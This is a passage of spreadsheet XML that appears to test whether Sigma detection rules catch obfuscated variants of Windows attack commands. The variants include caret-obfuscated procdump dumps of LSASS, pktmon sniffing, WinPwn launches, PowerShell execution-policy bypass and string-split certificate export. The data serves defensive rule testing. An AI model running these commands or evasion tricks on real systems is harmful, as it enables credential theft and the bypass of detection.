        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="43" t="n"/>
      <c r="B383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C383" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D383" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E383" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -"m^a" l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I383" s="44" t="n"/>
      <c r="J383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K383" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="n"/>
      <c r="B384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C384" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D384" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E384" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H384" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I384" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J384" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K384" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C385" s="44" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D385" s="44" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E385" s="44" t="inlineStr">
        <is>
          <t>netsh tr st capture=yes</t>
        </is>
      </c>
      <c r="F385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I385" s="44" t="n"/>
      <c r="J385" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K385" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="44" t="n"/>
      <c r="B386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C386" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D386" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E386" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics --trace</t>
        </is>
      </c>
      <c r="F386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J386" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="44" t="n"/>
      <c r="B387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C387" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D387" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E387" s="44" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" -"-comp" nics --trace</t>
        </is>
      </c>
      <c r="F387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I387" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J387" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="44" t="n"/>
      <c r="B388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C388" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D388" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E388" s="44" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics --tRaCe</t>
        </is>
      </c>
      <c r="F388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H388" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I388" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J388" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K388" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="44" t="n"/>
      <c r="B389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C389" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D389" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E389" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics -"-trace"</t>
        </is>
      </c>
      <c r="F389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G389" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H389" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I389" s="44" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J389" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="44" t="n"/>
      <c r="B390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C390" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D390" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E390" s="44" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics /"-trace"</t>
        </is>
      </c>
      <c r="F390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G390" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H390" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I390" s="44" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J390" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="44" t="n"/>
      <c r="B391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C391" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D391" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E391" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics --traCE</t>
        </is>
      </c>
      <c r="F391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G391" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H391" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I391" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J391" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="44" t="n"/>
      <c r="B392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C392" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D392" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E392" s="44" t="inlineStr">
        <is>
          <t>pktmon start /"-capture" --comp nics --TrAcE</t>
        </is>
      </c>
      <c r="F392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G392" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H392" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I392" s="44" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J392" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="44" t="n"/>
      <c r="B393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C393" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D393" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E393" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --ComP nics --trace</t>
        </is>
      </c>
      <c r="F393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G393" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H393" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="44" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J393" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="44" t="n"/>
      <c r="B394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C394" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D394" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E394" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --coMp nics --trace</t>
        </is>
      </c>
      <c r="F394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G394" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H394" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="44" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J394" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="44" t="n"/>
      <c r="B395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C395" s="44" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D395" s="44" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E395" s="44" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics /"-trace"</t>
        </is>
      </c>
      <c r="F395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G395" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H395" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J395" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K395" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B396" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C396" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D396" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E396" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G396" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H396" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I396" s="43" t="n"/>
      <c r="J396" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K396" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="397" ht="15.75" customHeight="1" s="42">
      <c r="A397" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C397" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D397" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E397" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F397" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G397" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H397" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I397" s="43" t="n"/>
      <c r="J397" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K397" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="398" ht="15.75" customHeight="1" s="42">
      <c r="A398" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B398" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C398" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D398" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E398" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I398" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J398" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K398" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="399" ht="15.75" customHeight="1" s="42">
      <c r="A399" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B399" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C399" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D399" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E399" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G399" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H399" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I399" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J399" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K399" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="400" ht="15.75" customHeight="1" s="42">
      <c r="A400" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C400" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D400" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E400" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I400" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J400" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K400" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="401" ht="15.75" customHeight="1" s="42">
      <c r="A401" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C401" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D401" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E401" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G401" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H401" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I401" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J401" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K401" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="402" ht="15.75" customHeight="1" s="42">
      <c r="A402" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C402" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D402" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E402" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G402" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H402" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J402" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="inlineStr">
        <is>
          <t>t1056.002</t>
        </is>
      </c>
      <c r="B403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_mouselock_execution</t>
        </is>
      </c>
      <c r="C403" s="44" t="inlineStr">
        <is>
          <t>PUA - Mouse Lock Execution</t>
        </is>
      </c>
      <c r="D403" s="44" t="inlineStr">
        <is>
          <t>c9192ad9-75e5-43eb-8647-82a0a5b493e3</t>
        </is>
      </c>
      <c r="E403" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Path\To\Mouse Lock_2.0.exe" "C:\Windows\Temp\sys_util.exe" &amp;&amp; "C:\Windows\Temp\sys_util.exe"</t>
        </is>
      </c>
      <c r="F403" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I403" s="43" t="inlineStr">
        <is>
          <t>PUA - Mouse Lock Execution (c9192ad9-75e5-43eb-8647-82a0a5b493e3)</t>
        </is>
      </c>
      <c r="J403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="n"/>
      <c r="B404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C404" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D404" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E404" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H404" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I404" s="43" t="n"/>
      <c r="J404" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K404" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="n"/>
      <c r="B405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C405" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D405" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E405" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H405" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I405" s="43" t="n"/>
      <c r="J405" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K405" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="n"/>
      <c r="B406" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C406" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D406" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E406" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H406" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I406" s="44" t="n"/>
      <c r="J406" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K406" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="n"/>
      <c r="B407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C407" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D407" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E407" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H407" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I407" s="43" t="n"/>
      <c r="J407" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K407" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="n"/>
      <c r="B408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C408" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D408" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E408" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H408" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K408" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="n"/>
      <c r="B409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C409" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D409" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E409" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H409" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I409" s="44" t="n"/>
      <c r="J409" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K409" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
